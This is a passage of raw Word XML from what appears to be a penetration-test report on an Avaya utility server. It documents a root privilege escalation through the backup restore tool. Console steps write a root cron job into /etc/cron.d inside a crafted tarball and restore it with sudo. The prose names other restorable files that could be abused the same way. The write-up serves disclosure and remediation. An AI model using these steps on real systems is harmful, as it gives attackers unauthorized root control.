              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mkdir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>util_backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5028695D" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ cat &lt;&lt; EOF &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>util_backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="395F051A" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>SHELL=/bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D539B01" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>PATH=/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sbin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:/bin:/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sbin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/bin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B6E1FB2" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>MAILTO=root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AC2E18F" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>HOME=/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1153E206" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>* * * * * root /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/presto</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A12C710" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>EOF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D6B8436" w14:textId="20FE448A" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F3225C">
              <w:t>644</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>util_backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="40BBC576" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ cd </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>util_backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7E932265" w14:textId="3D5971E9" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ tar -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>czvf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ../util_backup.tar.gz </w:t>
            </w:r>
            <w:r w:rsidR="00F3225C">
              <w:t>--owner=0 --user=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00F3225C">
              <w:t xml:space="preserve">0 </w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9B776C" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>$ cd</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve"> ..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00415875" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ rm -rf </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>util_backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65EB3B78" w14:textId="2B73C6C5" w:rsidR="00B6483E" w:rsidRPr="009A383C" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>tar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>czvf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>../mal_poc.tar.gz .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C5568EE" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ cd</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve"> ..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43A71767" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ rm -rf stage/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C3992F2" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ rm -f </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="149C3E7E" w14:textId="77777777" w:rsidR="00B6483E" w:rsidRDefault="00B6483E" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /opt/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avaya</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>common_services</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/backup -r mal_poc.tar.gz</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DAE401" w14:textId="77777777" w:rsidR="00DD493A" w:rsidRDefault="00DD493A" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6507B6E8" w14:textId="6C093E1A" w:rsidR="00DD493A" w:rsidRDefault="00DD493A" w:rsidP="00B6483E">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t># At this point /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> should exist.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0310C2A2" w14:textId="77777777" w:rsidR="00D57027" w:rsidRDefault="00D57027" w:rsidP="00955ABE"/>
    <w:p w14:paraId="36FAB795" w14:textId="16F64BC6" w:rsidR="00CC7C11" w:rsidRDefault="00E04FFF" w:rsidP="00B60337">
      <w:r>
        <w:t>The restore process does implement safe guards to prevent path-traversal and restoring of unexpected files, however</w:t>
      </w:r>
      <w:r w:rsidR="00F3225C">
        <w:t xml:space="preserve"> the folder</w:t>
      </w:r>
      <w:r w:rsidR="00481121">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00481121">
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00481121">
        <w:t xml:space="preserve">” is specifically allowed in the list which is </w:t>
      </w:r>
      <w:r w:rsidR="005007F1">
        <w:t>located here</w:t>
      </w:r>
      <w:r w:rsidR="00CC7C11">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00481121">
        <w:t>/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00481121">
        <w:t>avaya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00481121">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00481121">
        <w:t>common_services</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00481121">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00481121">
        <w:t>filelist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B60337">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8201C" w14:textId="1D17CE93" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>In addition, /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avaya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>common_services</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filelist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> allows backup/restore of the following files:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dhcpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40E48234" w14:textId="355C923A" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>/opt/util/bin/CDR_Daily.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1963C8EE" w14:textId="3B629715" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>/opt/util/bin/CDR_Monthly.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420033E" w14:textId="504ADC91" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>/opt/util/bin/CDR_Weekly.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B70DA65" w14:textId="1A4C807F" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/opt/util/bin/Get_CM_CDRs.sh </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>The “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dhcpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” file could be overwritten to achieve root in a similar fashion to what is described in issue “</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref58996119 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t xml:space="preserve">8) Root Privilege Escalation via Overly Permissive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00011234">
        <w:t>Sudoer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00011234">
        <w:t xml:space="preserve"> Configuration (DHCP Daemon Configuration Process</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DF1B2C" w14:textId="0EF6CFA0" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">The other four listed Bash scripts are already called by existing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> jobs (as root) under /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, and thus replacing or modifying any of those jobs would also eventually result in code execution as root:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CC7C11" w14:paraId="722BD705" w14:textId="77777777" w:rsidTr="00CC7C11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="05601D1B" w14:textId="53CD7B77" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ find /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/ -type f -print -exec cat {} \;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48444D69" w14:textId="5A384C57" w:rsidR="00CC7C11" w:rsidRDefault="00F3225C" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CD59B05" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F5A841E" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CDR_Weekly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4E8B5DF8" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>SHELL=/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="53A0E2A9" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>HOME=/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E2458FD" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"># wi00338331 - Removal of superfluous </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> e-mails.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3376DBD2" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>MAILTO=""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DBCF11" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t># run Weekly CDR E-mail Jobs on a Monday at 02:00.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18A3BFD5" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">#00 2 * * 1 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /opt/util/bin/CDR_Weekly.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D02FD35" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="56B8C83F" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Get_CM_CDRs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="09E70B9B" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>SHELL=/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7FB4F04D" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>HOME=/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B73C69D" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"># wi00338331 - Removal of superfluous </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> e-mails.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03974CA1" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>MAILTO=""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E637CED" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t># run CDR Copy from CM to Utility Server every 30 minutes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29BC7208" w14:textId="77777777" w:rsidR="00CC7C11" w:rsidRDefault="00CC7C11" w:rsidP="00CC7C11">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
